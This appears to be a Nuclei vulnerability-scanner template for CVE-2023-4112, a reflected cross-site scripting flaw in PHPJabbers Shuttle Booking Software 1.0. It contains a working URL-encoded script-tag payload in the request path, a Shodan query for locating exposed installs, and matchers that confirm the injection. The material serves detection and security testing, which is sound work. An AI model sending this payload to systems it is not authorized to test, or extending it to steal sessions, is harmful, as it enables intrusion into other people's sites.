38 lines
1.4 KiB
YAML
38 lines
1.4 KiB
YAML
id: CVE-2023-4112
|
|
|
|
info:
|
|
name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
|
|
reference:
|
|
- https://www.exploitalert.com/view-details.html?id=39750
|
|
- https://cxsecurity.com/ascii/WLB-2023080012
|
|
- http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4112
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-4112
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: html:"PHP Jabbers.com"
|
|
tags: cve,cve2023,xss,unauth,phpjabbers
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'status_code == 200'
|
|
condition: and
|